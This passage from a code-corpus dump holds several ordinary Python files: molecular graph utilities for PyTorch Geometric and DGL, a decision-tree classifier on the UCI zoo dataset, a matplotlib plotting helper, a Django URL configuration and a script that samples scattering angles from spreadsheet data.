edge_index = torch.tensor(np.array(edges_list).T, dtype=torch.long)\n\n\n # data.edge_attr: Edge feature matrix with shape [num_edges, num_edge_features]\n edge_attr = torch.tensor(np.array(edge_features_list),\n dtype=torch.long)\n else: # mol has no bonds\n edge_index = torch.empty((2, 0), dtype=torch.long)\n edge_attr = torch.empty((0, num_bond_features), dtype=torch.long)\n\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\n\n return data\n\ndef mol_to_dgl_data_obj_simple(mol):\n \"\"\"\n Converts rdkit mol object to graph Data object required by the pytorch\n geometric package. NB: Uses simplified atom and bond features, and represent\n as indices\n :param mol: rdkit mol object\n :return: graph data object with the attributes: x, edge_index, edge_attr\n \"\"\"\n # atoms\n num_atom_features = 2 # atom type, chirality tag\n atom_features_list = []\n for atom in mol.GetAtoms():\n atom_feature = [allowable_features['possible_atomic_num_list'].index(\n atom.GetAtomicNum())] + [allowable_features[\n 'possible_chirality_list'].index(atom.GetChiralTag())]\n atom_features_list.append(atom_feature)\n x = torch.tensor(np.array(atom_features_list), dtype=torch.long)\n\n num_atoms = len(mol.GetAtoms())\n if len(mol.GetBonds()) > 0:\n edge_fr_list = list()\n edge_to_list = list()\n for bond in mol.GetBonds():\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n edge_fr_list += [i, j]\n edge_to_list += [j, i]\n edge_fr = torch.tensor(edge_fr_list, dtype=torch.long)\n edge_to = torch.tensor(edge_to_list, dtype=torch.long)\n else:\n edge_fr = torch.empty((0, ), dtype=torch.long)\n edge_to = torch.empty((0, ), dtype=torch.long)\n dglg = dgl.DGLGraph()\n dglg.add_nodes(num_atoms)\n dglg.add_edges(edge_fr, edge_to)\n return dglg\n\n\ndef graph_data_obj_to_mol_simple(data_x, data_edge_index, data_edge_attr):\n \"\"\"\n Convert pytorch geometric data obj to rdkit mol object. 
NB: Uses simplified\n atom and bond features, and represent as indices.\n :param: data_x:\n :param: data_edge_index:\n :param: data_edge_attr\n :return:\n \"\"\"\n mol = Chem.RWMol()\n\n # atoms\n atom_features = data_x.cpu().numpy()\n num_atoms = atom_features.shape[0]\n for i in range(num_atoms):\n atomic_num_idx, chirality_tag_idx = atom_features[i]\n # print(atomic_num_idx)\n atomic_num = allowable_features['possible_atomic_num_list'][atomic_num_idx - 1]\n chirality_tag = allowable_features['possible_chirality_list'][chirality_tag_idx]\n atom = Chem.Atom(atomic_num)\n atom.SetChiralTag(chirality_tag)\n mol.AddAtom(atom)\n\n # bonds\n edge_index = data_edge_index.cpu().numpy()\n edge_attr = data_edge_attr.cpu().numpy()\n num_bonds = edge_index.shape[1]\n for j in range(0, num_bonds, 2):\n begin_idx = int(edge_index[0, j])\n end_idx = int(edge_index[1, j])\n bond_type_idx, bond_dir_idx = edge_attr[j]\n bond_type = allowable_features['possible_bonds'][bond_type_idx]\n bond_dir = allowable_features['possible_bond_dirs'][bond_dir_idx]\n mol.AddBond(begin_idx, end_idx, bond_type)\n # set bond direction\n new_bond = mol.GetBondBetweenAtoms(begin_idx, end_idx)\n new_bond.SetBondDir(bond_dir)\n\n # Chem.SanitizeMol(mol) # fails for COC1=CC2=C(NC(=N2)[S@@](=O)CC2=NC=C(\n # C)C(OC)=C2C)C=C1, when aromatic bond is possible\n # when we do not have aromatic bonds\n # Chem.SanitizeMol(mol, sanitizeOps=Chem.SanitizeFlags.SANITIZE_KEKULIZE)\n\n return mol\n\ndef gen_bfs_order(edge_index, seed):\n nodes_to_neighs = dict()\n for i in range(edge_index.size(1)):\n a, b = int(edge_index[0, i]), int(edge_index[1, i])\n if a not in nodes_to_neighs:\n nodes_to_neighs[a] = [b]\n else:\n nodes_to_neighs[a].append(b)\n if b not in nodes_to_neighs:\n nodes_to_neighs[b] = [a]\n else:\n nodes_to_neighs[b].append(a)\n ordered_nodes = {seed: 0}\n nodes_to_exi = {seed: 1}\n que = [seed]\n cnt = 0\n l = 0\n while (l < len(que)):\n now = que[l]\n l += 1\n for i in nodes_to_neighs[now]:\n if i in nodes_to_exi:\n continue\n else:\n que.append(i)\n nodes_to_exi[i] = 1\n cnt += 1\n ordered_nodes[i] = cnt\n return ordered_nodes\n\n\ndef graph_data_part_to_nx_simple(edge_index, num_nodes):\n \"\"\"\n Converts graph Data object required by the pytorch geometric package to\n network x data object. NB: Uses simplified atom and bond features,\n and represent as indices. NB: possible issues with recapitulating relative\n stereochemistry since the edges in the nx object are unordered.\n :param data: pytorch geometric Data object\n :return: network x object\n \"\"\"\n G = nx.Graph()\n\n # atoms\n # for i in range(num_nodes):\n G.add_nodes_from([j for j in range(num_nodes)])\n\n\n #\n # atom_features = data.x.cpu().numpy()\n # num_atoms = atom_features.shape[0]\n # for i in range(num_atoms):\n # atomic_num_idx, chirality_tag_idx = atom_features[i]\n # G.add_node(i, atom_num_idx=atomic_num_idx, chirality_tag_idx=chirality_tag_idx)\n # pass\n #\n # # bonds\n # edge_index = data.edge_index.cpu().numpy()\n # edge_attr = data.edge_attr.cpu().numpy()\n num_bonds = edge_index.shape[1]\n for j in range(0, num_bonds, 2):\n begin_idx = int(edge_index[0, j])\n end_idx = int(edge_index[1, j])\n # bond_type_idx, bond_dir_idx = edge_attr[j]\n if not G.has_edge(begin_idx, end_idx):\n G.add_edge(begin_idx, end_idx)\n return nx.to_numpy_matrix(G)\n\n\n # return G\n\ndef graph_data_part_to_nx_simple_no_loop(edge_index, num_nodes):\n \"\"\"\n Converts graph Data object required by the pytorch geometric package to\n network x data object. 
NB: Uses simplified atom and bond features,\n and represent as indices. NB: possible issues with recapitulating relative\n stereochemistry since the edges in the nx object are unordered.\n :param data: pytorch geometric Data object\n :return: network x object\n \"\"\"\n G = nx.Graph()\n\n # atoms\n # for i in range(num_nodes):\n G.add_nodes_from([j for j in range(num_nodes)])\n\n\n #\n # atom_features = data.x.cpu().numpy()\n # num_atoms = atom_features.shape[0]\n # for i in range(num_atoms):\n # atomic_num_idx, chirality_tag_idx = atom_features[i]\n # G.add_node(i, atom_num_idx=atomic_num_idx, chirality_tag_idx=chirality_tag_idx)\n # pass\n #\n # # bonds\n # edge_index = data.edge_index.cpu().numpy()\n # edge_attr = data.edge_attr.cpu().numpy()\n num_bonds = edge_index.shape[1]\n for j in range(0, num_bonds, 2):\n begin_idx = int(edge_index[0, j])\n end_idx = int(edge_index[1, j])\n # bond_type_idx, bond_dir_idx = edge_attr[j]\n if not G.has_edge(begin_idx, end_idx) and begin_idx != end_idx:\n G.add_edge(begin_idx, end_idx)\n return nx.to_numpy_matrix(G)\n\ndef from_edge_index_to_adj(edge_index, num_nodes):\n A = torch.zeros(num_nodes, num_nodes)\n num_edges = edge_index.shape[1]\n for j in range(num_edges):\n a, b = edge_index[0, j], edge_index[1, j]\n if a != b:\n try:\n A[a, b] = A[b, a] = 1.\n except:\n print(num_edges)\n print(edge_index)\n raise RuntimeError(\"aaa\")\n return A\n\ndef get_subgraph_data(data, node_list):\n n_sample = len(node_list)\n idxnew_to_idx = {i: node_idx for i, node_idx in enumerate(node_list)}\n idx_to_idxnew = {node_idx: i for i, node_idx in enumerate(node_list)}\n x = torch.zeros(n_sample, data.x.size(1), dtype=torch.long)\n for j in range(n_sample):\n x[j, :] = data.x[idxnew_to_idx[j], :]\n edge_idx = []\n edge_attri = []\n for i in range(data.edge_index.size(1)):\n a = int(data.edge_index[0, i])\n b = int(data.edge_index[1, i])\n\n if a in idx_to_idxnew and b in idx_to_idxnew:\n a = idx_to_idxnew[a]\n b = idx_to_idxnew[b]\n edge_idx.append([a, b])\n edge_attri.append(data.edge_attr[i, :].unsqueeze(0))\n # print(len(edge_attri), data.edge_attr.size(), n_sample, edge_attri[0])\n\n # if len(edge_attri) == 0:\n # print(len(edge_idx), n_sample, ratio, data.x.size(0))\n # raise RuntimeError(\"len(edge_Attri) == 0!\")\n edge_idx = np.array(edge_idx).T\n edge_idx = torch.from_numpy(edge_idx).long()\n # edge_attri = torch.FloatTensor(edge_attri)\n if len(edge_attri) == 0:\n edge_attri = torch.empty((0, 2), dtype=torch.long)\n else:\n edge_attri = torch.cat(edge_attri, dim=0)\n return x, edge_idx, edge_attri\n\n\ndef sample_subgraph(data, ratio, seed=None):\n assert ratio > 0 and ratio < 1\n num_atoms = data.x.size(0)\n n_sample = int(ratio * num_atoms)\n if n_sample <= 1:\n n_sample = 2\n if seed == None:\n seed = np.random.choice(np.arange(0, num_atoms), size=1)[0]\n G = graph_data_obj_to_nx_simple(data)\n\n node_to_dis = nx.single_source_shortest_path_length(G, seed)\n node_to_dis = sorted(node_to_dis.items(), key=lambda x: x[1])\n sampled_nodes = [x[0] for x in node_to_dis[:n_sample]]\n n_sample = len(sampled_nodes)\n idx_to_idxnew = {j: i for i, j in enumerate(sampled_nodes)}\n idxnew_to_idx = {i: j for i, j in enumerate(sampled_nodes)}\n x = torch.zeros(n_sample, data.x.size(1), dtype=torch.long)\n for j in range(n_sample):\n x[j, :] = data.x[idxnew_to_idx[j], :]\n edge_idx = []\n edge_attri = []\n for i in range(data.edge_index.size(1)):\n a = int(data.edge_index[0, i])\n b = int(data.edge_index[1, i])\n\n if a in idx_to_idxnew and b in idx_to_idxnew:\n a = 
idx_to_idxnew[a]\n b = idx_to_idxnew[b]\n edge_idx.append([a, b])\n edge_attri.append(data.edge_attr[i, :].unsqueeze(0))\n # print(len(edge_attri), data.edge_attr.size(), n_sample, edge_attri[0])\n\n if len(edge_attri) == 0:\n print(len(edge_idx), n_sample, ratio, data.x.size(0))\n raise RuntimeError(\"len(edge_Attri) == 0!\")\n edge_idx = np.array(edge_idx).T\n edge_idx = torch.from_numpy(edge_idx).long()\n # edge_attri = torch.FloatTensor(edge_attri)\n edge_attri = torch.cat(edge_attri, dim=0)\n\n # edge_attri = torch.from_numpy(np.array(edge_attri))\n\n return x, edge_idx, edge_attri\n\n\ndef sampled_subgraph_gcc(data, seed=None, step_dist=[1.0, 0.0, 0.0], length=64, rsprob=0.8):\n # assert ratio > 0 and ratio < 1\n num_atoms = data.x.size(0)\n # n_sample = int(ratio * num_atoms)\n if seed == None:\n seed = np.random.choice(np.arange(0, num_atoms), size=1)[0]\n\n # step_dist = [1.0, 0.0, 0.0]\n # print(seed)\n step = np.random.choice(len(step_dist), 1, p=step_dist)[0] + 1\n G = graph_data_obj_to_nx_simple(data)\n dgl_bg = dgl.DGLGraph(G)\n # edges = torch.tensor(dgl_bg.edges(), dtype=torch.long)\n # dgl_bg = dgl.graph((edges[0], edges[1]))\n # print(seed)\n length = 64\n traces, _ = dgl.sampling.random_walk(\n dgl_bg,\n [seed],\n restart_prob=0.0,\n length=step)\n # print(len(traces[0]))\n other_node = int(traces[0][-1].item())\n # traces, _ = dgl.sampling.random_walk(\n # dgl_bg,\n # [seed, other_node],\n # # prob=\"pos_sample_p\",\n # restart_prob=rsprob,\n # length=length * 19)\n # traces = dgl.contrib.sampling.random_walk_with_restart(\n # dgl_bg,\n # seeds=[seed, other_node],\n # restart_prob=rsprob,\n # max_nodes_per_seed=64,\n # )\n\n traces, _ = dgl.sampling.random_walk(\n dgl_bg,\n [seed for __ in range(1)],\n # prob=\"pos_sample_p\",\n restart_prob=0.0,\n length=length)\n # todo: count the frequency and choose top k ones?\n # subv = torch.unique(traces).tolist()\n subv_a = torch.unique(traces).tolist()\n # subv_a = torch.unique(traces[0]).tolist()\n\n traces, _ = dgl.sampling.random_walk(\n dgl_bg,\n [other_node for __ in range(1)],\n # prob=\"pos_sample_p\",\n restart_prob=0.0,\n length=length)\n subv_b = torch.unique(traces).tolist()\n # subv_b = torch.unique(traces[1]).tolist()\n # print(\"calculated...\", subv)\n # try:\n # # subv.remove(seed)\n # subv_a.remove(seed)\n # subv_a.remove(seed)\n # except:\n # pass\n try:\n subv_a.remove(-1)\n subv_b.remove(-1)\n except:\n pass\n if len(subv_a) == 1:\n subv_a.append(other_node)\n if len(subv_b) == 1:\n subv_b.append(seed)\n # print(len(subv_a), len(subv_b), seed, other_node)\n return [subv_a, subv_b]\n\n\ndef sample_subgraph_only_node(data, ratio, seed=None):\n assert ratio > 0 and ratio < 1\n num_atoms = data.x.size(0)\n n_sample = int(ratio * num_atoms)\n if seed == None:\n seed = np.random.choice(np.arange(0, num_atoms), size=1)[0]\n G = graph_data_obj_to_nx_simple(data)\n\n node_to_dis = nx.single_source_shortest_path_length(G, seed)\n node_to_dis = sorted(node_to_dis.items(), key=lambda x: x[1])\n sampled_nodes = [x[0] for x in node_to_dis[:n_sample]]\n # n_sample = len(sampled_nodes)\n return sampled_nodes\n\n\ndef filter_attri(data, k=3, sigma=1):\n G = graph_data_obj_to_nx_simple(data)\n # G.remove_edges_from(G.selfloop_edges())\n adj = nx.to_numpy_matrix(G)\n N = adj.shape[0]\n adj = torch.from_numpy(adj) + (sigma - 1) * torch.eye(N)\n D = adj.sum(dim=1, keepdim=True)\n A_rw = adj / D\n filtered_attri = data.x\n for j in range(k):\n filtered_attri = torch.matmul(A_rw.float(), filtered_attri.float())\n return 
filtered_attri\n\n\ndef filter_attri_from_batch(x, edge_index, num_nodes, num_edges, filter_k, sigma=1):\n filtered_x = list()\n num_graphs = len(num_nodes)\n cum_nodes = 0\n cum_edges = 0\n for i in range(num_graphs):\n now_graph_nodes = num_nodes[i]\n now_graph_edges = num_edges[i]\n x_now = x[cum_nodes: cum_nodes + now_graph_nodes, :]\n if filter_k[i] == 0:\n filtered_x.append(x_now)\n cum_nodes += now_graph_nodes\n cum_edges += now_graph_edges\n continue\n # print(i, now_graph_nodes, x_now.size(0))\n # print(filter_k)\n edge_index_now = edge_index[:, cum_edges: cum_edges + now_graph_edges] - cum_nodes\n # A = from_edge_index_to_adj(edge_index_now, now_graph_nodes) + sigma * torch.eye(now_graph_nodes)\n A = torch.from_numpy(graph_data_part_to_nx_simple(edge_index_now, now_graph_nodes)) + sigma * torch.eye(now_graph_nodes)\n D = A.sum(dim=1, keepdim=True)\n A_rw = A / D\n A_rw = A_rw.to(x.device).float()\n x_filtered = x_now\n for j in range(filter_k[i]):\n x_filtered = torch.matmul(A_rw, x_filtered)\n filtered_x.append(x_filtered)\n cum_nodes += now_graph_nodes\n cum_edges += now_graph_edges\n\n filtered_x = torch.cat(filtered_x, dim=0)\n assert filtered_x.size() == x.size(), \"must keep the same dimension!\"\n return filtered_x\n\n\ndef from_rep_to_subgraph_rep(batch, x, pool_func=\"sum\"):\n tot_num_sub = batch.num_sub_nodes.size(0)\n subgraph_reps = list()\n cusum_nodes = 0\n for i in range(tot_num_sub):\n now_sub_num_nodes = int(batch.num_sub_nodes[i])\n now_x_range = batch.s_nodes[cusum_nodes: cusum_nodes + now_sub_num_nodes]\n now_x = x[now_x_range, :]\n assert now_x.size(0) == now_sub_num_nodes\n if pool_func == \"sum\":\n now_sub_rep = now_x.sum(dim=0, keepdims=True)\n elif pool_func == \"mean\":\n now_sub_rep = now_x.mean(dim=0, keepdims=True)\n else:\n raise NotImplementedError(\"pool_func should be sum or mean\")\n subgraph_reps.append(now_sub_rep)\n cusum_nodes += now_sub_num_nodes\n assert now_sub_rep.size(0) == 1\n subgraph_reps = torch.cat(subgraph_reps, dim=0)\n assert subgraph_reps.size(0) == tot_num_sub\n return subgraph_reps\n\ndef node_context_extract_with_step(data, seed, step):\n G = graph_data_obj_to_nx_simple(data)\n seed_in_step = nx.single_source_shortest_path_length(G, seed, step)\n context_nodes = list(seed_in_step.keys())\n return context_nodes\n\ndef get_bfs_order(data, seed):\n G = graph_data_obj_to_nx_simple(data)\n node_to_step = nx.single_source_shortest_path_length(G, seed)\n node_step_list = sorted(node_to_step.items(), key=lambda i: i[0])\n node_ordered = [par[0] for par in node_step_list]\n return node_ordered\n\ndef get_adj_dict(data):\n node_to_adj = dict()\n\n num_edges = data.edge_index.size(1)\n for i in range(num_edges):\n a, b = int(data.edge_index[0, i]), int(data.edge_index[1, i])\n if a not in node_to_adj:\n node_to_adj[a] = dict()\n if b not in node_to_adj:\n node_to_adj[b] = dict()\n node_to_adj[a][b] = 1\n node_to_adj[b][a] = 1\n return node_to_adj\n\nimport hashlib\nimport math\n\ndef positional_embedding(node_to_data, dh_2):\n num_nodes = len(node_to_data)\n all_pos_emb = list()\n for node in range(num_nodes):\n color = node_to_data[node]\n wl_emb = [torch.tensor([math.sin(color / math.pow(10000, 2 * i / (dh_2 * 2))),\n math.cos(color / math.pow(10000, (2 * i + 1) / (dh_2 * 2)))]) for i in range(dh_2)]\n wl_emb = torch.cat(wl_emb, dim=0)\n all_pos_emb.append(wl_emb.unsqueeze(0))\n all_pos_emb = torch.cat(all_pos_emb, dim=0)\n return all_pos_emb\n\n\ndef get_wl_position_embedding(data, dh_2, max_iter=2):\n assert dh_2 > 0\n node_to_adj 
= get_adj_dict(data)\n    node_to_color = dict()\n    num_nodes = data.x.size(0)\n    for i in range(num_nodes):\n        node_to_color[i] = 1\n    iter_count = 0\n    while True:\n        node_to_color_new = dict()\n        for node in range(num_nodes):\n            neis_color_list = [node_to_color[nei] for nei in node_to_adj[node]]\n            color_string_list = [str(node_to_color[node])] + sorted([str(color) for color in neis_color_list])\n            color_string = \"_\".join(color_string_list)\n            hash_obj = hashlib.md5(color_string.encode())\n            hashing = hash_obj.hexdigest()\n            node_to_color_new[node] = hashing\n        color_index_dict = {k: v + 1 for v, k in enumerate(sorted(set(node_to_color_new.values())))}\n        for node in range(num_nodes):\n            node_to_color_new[node] = color_index_dict[node_to_color_new[node]]\n        if node_to_color_new == node_to_color or iter_count == max_iter:\n            break\n        else:\n            node_to_color = node_to_color_new\n            iter_count += 1\n    all_wl_emb = positional_embedding(node_to_color, dh_2)\n    assert all_wl_emb.size(0) == num_nodes\n    return all_wl_emb\n\n# todo for intimacy embedding, should use the embedding layer?\n# todo it seems that calculating the hop distance between two nodes is time consuming... then how can we solve it?\ndef get_node_context(S, k):\n    # S --- torch tensor n x n; modified in place\n    num_nodes = S.size(0)\n    # put each node first in its own context by maximizing its self-intimacy\n    S[torch.arange(num_nodes), torch.arange(num_nodes)] = 1000000.0\n    top_k_node_idx = torch.argsort(S, descending=True)[:, :k]\n    assert (top_k_node_idx[:, 0] == torch.arange(num_nodes)).all()\n    return top_k_node_idx\n\ndef get_intimacy_matrix(data, k, alpha=0.15, approx_mode=\"power\"):\n    assert k > 1\n    adj = graph_data_part_to_nx_simple_no_loop(data.edge_index, data.x.size(0))\n    adj = torch.from_numpy(adj)\n    n = adj.size(0)\n    D = adj.sum(dim=1, keepdim=True)\n    tilde_adj = adj / torch.clamp(D, min=1e-12)\n    inner_mat = torch.eye(n) + (1 - alpha) * tilde_adj\n    if approx_mode == \"power\":\n        # k-th matrix power of (I + (1 - alpha) * A_rw), a truncated-series\n        # approximation of the PageRank-style intimacy matrix\n        S = alpha * torch.matrix_power(inner_mat, k)\n    else:\n        raise NotImplementedError(\"approx_mode error\")\n    return S\n\ndef get_tree_edges(data):\n    # BFS from a random seed; returns the tree edge ids and the remaining edge ids\n    tree_edges = list()\n    queue = list()\n    num_atoms = data.x.size(0)\n    vis = {i: 0 for i in range(num_atoms)}\n    node_to_adjs = dict()\n    for i in range(0, data.edge_index.size(1), 2):\n        a, b = int(data.edge_index[0, i]), int(data.edge_index[1, i])\n        if a not in node_to_adjs:\n            node_to_adjs[a] = {}\n        if b not in node_to_adjs:\n            node_to_adjs[b] = {}\n        node_to_adjs[a][b] = i // 2\n        node_to_adjs[b][a] = i // 2\n    seed = np.random.choice(range(num_atoms), 1)[0]\n    queue.append(seed)\n    vis[seed] = 1\n    l = 0\n\n    while l != len(queue):\n        now = queue[l]\n        for nei in node_to_adjs[now]:\n            if vis[nei] == 0:\n                vis[nei] = 1\n                queue.append(nei)\n                tree_edges.append(node_to_adjs[now][nei])\n        l += 1\n\n    all_edges = range(data.edge_index.size(1) // 2)\n    no_tree_edges = set(all_edges) - set(tree_edges)\n    return tree_edges, 
no_tree_edges\n\n","sub_path":"chem/utils2.py","file_name":"utils2.py","file_ext":"py","file_size_in_byte":25442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597563710","text":"#Import the DecisionTreeClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nimport pandas as pd\n\n\n#Import the dataset \ndataset = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/zoo/zoo.data',\n names=['animal_name','hair','feathers','eggs','milk','airbone','aquatic','predator','toothed',\n 'backbone','breathes','venomous','fins','legs','tail','domestic','catsize','class'])\n#Drop the name,not a good feature to split the data on\ndataset=dataset.drop('animal_name',axis=1)\n\n\n#Split the data into a training and a testing set\ntrain_features = dataset.iloc[:80,:-1]\ntest_features = dataset.iloc[80:,:-1]\ntrain_targets = dataset.iloc[:80,-1]\ntest_targets = dataset.iloc[80:,-1]\n\n\n#Train the model\ntree = DecisionTreeClassifier(criterion = 'entropy').fit(train_features,train_targets)\n\n\n#Predict the classes of new, unseen data\nprediction = tree.predict(test_features)\n\n\n#Check the accuracy\nprint(\"Prediction accuracy -> \",tree.score(test_features,test_targets)*100,\"%\")\n\n# output -> Prediction accuracy -> 80.95238095238095 %\n","sub_path":"ClassificationModels/Python/DecisionTreeClassifier/Zoo.py","file_name":"Zoo.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541220015","text":"import matplotlib.pyplot as plt\nimport sys\nimport os\nimport csv\n\n\ndef dim(a):\n if not type(a) == list:\n return []\n return [len(a)] + dim(a[0])\n\n\ndef get_data_from_csv(dir_path, order=None, x_data_cols=1, uni_x=False):\n file_list = os.listdir(dir_path)\n file_num = len(file_list)\n # to skip the first row of the table or not\n skip_header = True\n # flag to create the y_data frame\n is_first = True\n # from (x_data_cols + 1), the data should be in y_data\n x_data = [[] for i in range(file_num)]\n\n for i in range(file_num):\n with open(dir_path + '/' + file_list[i]) as f:\n if not order:\n order = range(file_num)\n index = order[i]\n file = csv.reader(f, delimiter='\\t')\n\n # first, read the headers\n if skip_header:\n # skip the line.\n header = file.__next__()\n n_cols = len(header)\n else:\n pass\n\n if (is_first):\n y_data = [[[] for ii in range(n_cols - x_data_cols)] for jj in range(file_num)]\n is_first = False\n # then, read the data\n # typically, if the x_data_cols is 1, then the value is used as the x_ticks.\n # otherwise, it's the uniform gap and the number of entries is decided by the number of rows.\n for row_number, line in enumerate(file):\n for idx, value in enumerate(line):\n if idx < x_data_cols:\n if uni_x and idx == 0:\n x_data[index].append(row_number)\n elif not uni_x:\n x_data[index].append(int(value))\n else:\n y_data[index][idx - x_data_cols].append(float(value))\n\n return [x_data, y_data]\n\n\ndef plot_curve(x_data, y_data, xticks, xticklabel, yticks, yticklabel, xlabels, ylabels, legends, figsize, titles=None,\n subplots_adjustment=None, with_marker=True, show_ylabel=None, show_legend=None,\n legendsize='x-large', xticklabel_visible=None, yticklabel_visible=None):\n # determine how many subplots in the graph.\n # if the matrix is 3 dimensional, then the first dimension decides the number of subplots.\n # if the matrix is 2 dimensional, then the first dimension decides how many lines in the 
graph.\n\n # dimension represent the dimension of the graph\n dims = dim(y_data)\n dimension = len(dims)\n if dimension == 2:\n lines = [dims[0]]\n num_graphs = 1\n x_data = [x_data]\n y_data = [y_data]\n xticks = [xticks]\n xticklabel = [xticklabel]\n yticks = [yticks]\n yticklabel = [yticklabel]\n xlabels = [xlabels]\n ylabels = [ylabels]\n elif dimension == 3:\n lines = [len(x) for x in y_data]\n num_graphs = len(y_data)\n else:\n sys.exit(\"wrong dimension of the data\")\n\n line_style = ['-', '--', '-.', ':']\n markers = ['o', 'v', '^', 's', 'x', '+']\n fig, axs = plt.subplots(nrows=1, ncols=num_graphs, figsize=figsize)\n if subplots_adjustment:\n # plt.subplots_adjust(left=0.05, bottom=0.15, right=0.98, top=0.96, wspace=0.27)\n plt.subplots_adjust(left=subplots_adjustment['left'], right=subplots_adjustment['right'],\n top=subplots_adjustment['top'], bottom=subplots_adjustment['bottom'],\n wspace=subplots_adjustment['wspace'], hspace=subplots_adjustment['hspace'])\n\n plt.grid(ls=':', linewidth=1.2, alpha=0.7)\n\n if num_graphs == 1:\n axs = [axs]\n\n for index, axis in enumerate(axs):\n for i in range(lines[index]):\n ax = plt.axes(axis)\n ax.plot(x_data[index], y_data[index][i], marker=(markers[i % len(markers)] if with_marker else None),\n ls=line_style[i % len(line_style)], label=legends[index][i], markersize=6.6)\n ax.xaxis.set_ticks(xticks[index])\n ax.xaxis.set_ticklabels(xticklabel[index])\n ax.yaxis.set_ticks(yticks[index])\n ax.yaxis.set_ticklabels(yticklabel[index])\n ax.tick_params(labelsize=12)\n plt.xlabel(xlabels[index], fontsize='x-large')\n # if show_ylabel is None (default), then only the first graph will plot the ylabel.\n # otherwise the list will be used to determine to show ylabel or not.\n if not show_ylabel:\n if index == 0:\n plt.ylabel(ylabels[index], fontsize='x-large')\n elif show_ylabel[index]:\n plt.ylabel(ylabels[index], fontsize='x-large')\n # if show_legend is None (default), then only the first graph will plot the legend.\n # otherwise the list will be used to determine to show legend or not.\n if not show_legend:\n if index == 0:\n ax.legend(ncol=2, fancybox=True, shadow=True, fontsize=legendsize, loc='upper left')\n elif show_legend[index]:\n ax.legend(ncol=1, fancybox=True, shadow=True, fontsize=legendsize, loc='upper left')\n\n if titles:\n ax.set_title(titles[index], y=-0.3, fontsize='x-large')\n\n # make some ticklabel invisible, default is visible for all ticks\n if xticklabel_visible:\n x_ticks = ax.xaxis.get_major_ticks()\n for index, item in enumerate(xticklabel_visible):\n x_ticks[index].label1.set_visible(item)\n\n if yticklabel_visible:\n y_ticks = ax.yaxis.get_major_ticks()\n for pos, item in enumerate(yticklabel_visible[index]):\n y_ticks[pos].label1.set_visible(item)\n\n # all the subplots will have grid\n plt.grid(ls=':', linewidth=1.2, alpha=0.7)\n\n plt.show()\n","sub_path":"plt_curve/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191221817","text":"\"\"\"Algo_ser URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import view\nurlpatterns = [\n path('admin/', admin.site.urls),\n #path('test_print',view.test_print),\n path('index',view.index),\n #path('save_model',view.save_model),\n #path('test_predict',view.test_predict),\n path('modifyLoginData',view.modifyLoginData),\n path('trainModel',view.trainModel),\n path('predictModel',view.predictModel),\n path('creat_db',view.creat_db),\n path('test',view.test),\n]\n","sub_path":"Algorithm_ser/Algo_ser/Algo_ser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206721553","text":"from openpyxl import load_workbook\nfrom scipy.integrate import cumtrapz\nimport random as random\nimport matplotlib.pyplot as plt\nfrom bisect import bisect_left\n\ndef Choice(cdf,x):\n ''' Returns the the chosen value (corresponding to the CDF) that are closest to the choice random value (ranging from 0 to 1)'''\n choice = random.random()\n pos = bisect_left(cdf,choice)\n if pos == 0:\n pos_next = 1\n if pos == len(cdf) or pos == len(cdf)-1:\n pos = len(cdf)-1\n pos_next = len(cdf)-2\n else:\n if abs(choice-cdf[pos-1]) < abs(choice-cdf[pos+1]):\n pos_next = pos-1\n else:\n pos_next = pos+1 \n ''' linear interpolation between these points to esitmate the result '''\n m = abs(cdf[pos]-cdf[pos_next])/abs(x[pos]-x[pos_next])\n value = ((choice - cdf[pos])/m) + x[pos]\n return value\n\ndef CreateCDFDisc(probability,x):\n ''' For a discrete PDF, return a discrete CDF '''\n return cumtrapz(probability,initial=0)*(max(x)-min(x))/len(x),x\n \n\n\n \nwb = load_workbook(filename='ReadScatterData_1.xlsx')\nsheets = [wb['Sheet1'],wb['Sheet2']]\n\nEnergy_1 = []\nEnergy_2 = []\n\nAngles = [[],[]]\nProbs = [[],[]]\nCDF = [[],[]]\n\nEnergy_dic = [Energy_1,Energy_2]\n\nfor column in range(int(64/2)):\n Energy_1.append((sheets[0].cell(row=0,column=2*column)).value)\nfor column in range(int(252/2)):\n Energy_2.append((sheets[1].cell(row=0,column=2*column)).value)\n \nEnergy_current = [[],[]]\n \n \n\n \ndef DataBaseChoice(energy,choice):\n \n index_energy = min(range(len(Energy_dic[choice])),key=lambda i: abs(Energy_dic[choice][i]-energy))\n if Energy_dic[choice][index_energy] not in Energy_current[choice]:\n Energy_current[choice].append(Energy_dic[choice][index_energy])\n cosine , probs = [] , []\n row , angle = 0 , 0\n while angle != None:\n angle = sheets[choice].cell(row=row+2,column=2*index_energy).value\n prob = sheets[choice].cell(row=row+2,column=2*index_energy+1).value\n if angle == None:\n break\n cosine.append(angle)\n probs.append(prob)\n row += 1\n cdf , cosine = CreateCDFDisc(probs,cosine)\n Angles[choice].append(cosine)\n Probs[choice].append(probs)\n CDF[choice].append(cdf)\n current_index = Energy_current[choice].index(Energy_dic[choice][index_energy])\n angle = Choice(CDF[choice][current_index],Angles[choice][current_index])\n return angle\n\nhister = []\nfor i in range(10000):\n hister.append(DataBaseChoice(1.5E8,0))\n 
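# histogram of the 10000 angles sampled (energy 1.5E8, data set 0) from the tabulated CDF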
